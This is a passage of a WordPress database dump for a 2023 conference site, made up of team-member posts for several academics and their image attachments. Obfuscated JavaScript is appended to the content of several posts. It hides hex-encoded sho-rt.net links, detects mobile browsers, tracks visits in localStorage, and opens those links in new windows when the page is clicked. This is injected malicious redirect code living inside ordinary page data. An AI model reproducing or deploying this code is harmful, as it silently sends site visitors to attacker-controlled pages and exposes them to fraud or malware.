Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Lei Luo','','publish','closed','closed','','dr-lei-luo','','','2023-03-01 23:06:47','2023-03-01 23:06:47','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3914',0,'dt_team','',0),
(3915,1,'2023-03-01 23:06:25','2023-03-01 23:06:25','','w294','','inherit','open','closed','','w294','','','2023-03-01 23:06:25','2023-03-01 23:06:25','',3914,'https://gsw2023.com/wp-content/uploads/2023/03/w294.jpg',0,'attachment','image/jpeg',0),
(3916,1,'2023-03-01 23:08:19','2023-03-01 23:08:19','<!-- wp:paragraph -->\n<p>Carleton University</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Stephen Fai','','publish','closed','closed','','stephen-fai','','','2023-03-01 23:08:23','2023-03-01 23:08:23','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3916',0,'dt_team','',0),
(3917,1,'2023-03-01 23:07:53','2023-03-01 23:07:53','','w295','','inherit','open','closed','','w295','','','2023-03-01 23:07:53','2023-03-01 23:07:53','',3916,'https://gsw2023.com/wp-content/uploads/2023/03/w295.jpg',0,'attachment','image/jpeg',0),
(3918,1,'2023-03-01 23:09:29','2023-03-01 23:09:29','<!-- wp:paragraph -->\n<p>Duke University</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Maurizio Forte','','publish','closed','closed','','dr-maurizio-forte','','','2023-03-01 23:09:32','2023-03-01 23:09:32','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3918',0,'dt_team','',0),
(3919,1,'2023-03-01 23:09:03','2023-03-01 23:09:03','','w296','','inherit','open','closed','','w296','','','2023-03-01 23:09:03','2023-03-01 23:09:03','',3918,'https://gsw2023.com/wp-content/uploads/2023/03/w296.jpg',0,'attachment','image/jpeg',0),
(3920,1,'2023-03-01 23:11:58','2023-03-01 23:11:58','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62, 67, 70, 72, 74\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'